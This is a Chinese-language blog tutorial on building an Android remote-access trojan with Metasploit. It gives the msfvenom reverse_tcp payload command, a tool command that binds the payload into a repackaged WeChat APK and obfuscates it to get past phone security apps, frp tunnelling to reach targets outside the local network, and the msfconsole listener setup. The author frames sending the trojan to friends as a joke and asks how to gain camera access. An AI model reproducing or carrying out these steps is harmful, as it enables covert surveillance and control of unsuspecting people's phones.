Kali Linux使用MSF木马入侵安卓手机

声明：

1. 本文章仅做娱乐和学习，切勿非法使用！！
2. 本人技术一般，水平有限，如有不对请多多指正。

一、环境准备

1. Kali linux
2. 安卓手机一部（安卓11）

二、内网穿透

要想玩的好，总不能本地玩自己吧，也得和周边朋友开个玩笑吧，所以就得做内网穿透了，免费内网穿透可以看这位大佬的

CSDN博主「Lisa Cpolar」
我这边用的是自己frp拿自己服务器做了内网穿透

三、木马生成并加到apk

直接用msf生成的apk打开没有内容，安装报毒，且目前的安卓11以上无法直接安装，

msfvenom -p Android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk

网上大部分都是生成后对apk反编译加马，加签名等等，这边用这位大佬的python工具直接给apk加马，把msf生成的安卓远控附加进普通的app中，并进行加固隐藏特征。可以绕过常见的手机安全管家。
大佬GItHub
使安装python3, Java环境.
使用Python3生成apk文件, 需要指定msf远控链接的IP和端口.（本地的填本地kali的IP，做了内网穿透填穿透后的公网地址和端口）

python main.py --lhost 192.168.0.106 --lport 1433  -n ../微信_7.0.22.apk

三、使用msfconsole加载handler.rc进行服务端监听

加马完成后会在WorkDir文件夹下生成一个handler.rc文件，做了内网穿透的把此文件里面的ip改为kali机的IP,端口改为做kali本地监听公网的那个端口**（注意和上面那个端口的区别）**
然后使用msfconsole加载handler.rc进行服务端监听

msfconsole -r WorkDir/handler.rc

四、将apk发给目标机安装

请勿违法违规！

五、结束

对方安装点击就会被监听到，help命令查看

六、问题

现在手机基本都控制着不给权限，比如我用一个音乐软件只有存储和音频权限，只能截图，获取安装的软件列表，打开软件之类的，要是想控制摄像头就不行，软件也会报错，现在问题就是没办法主动获取权限，只能由用户授权，而且大佬的加马工具也不是所有软件都能成功。
能力有限，水平一般，希望有办法的大佬们指点一下。

来源地址：https://blog.csdn.net/philip_z/article/details/129014231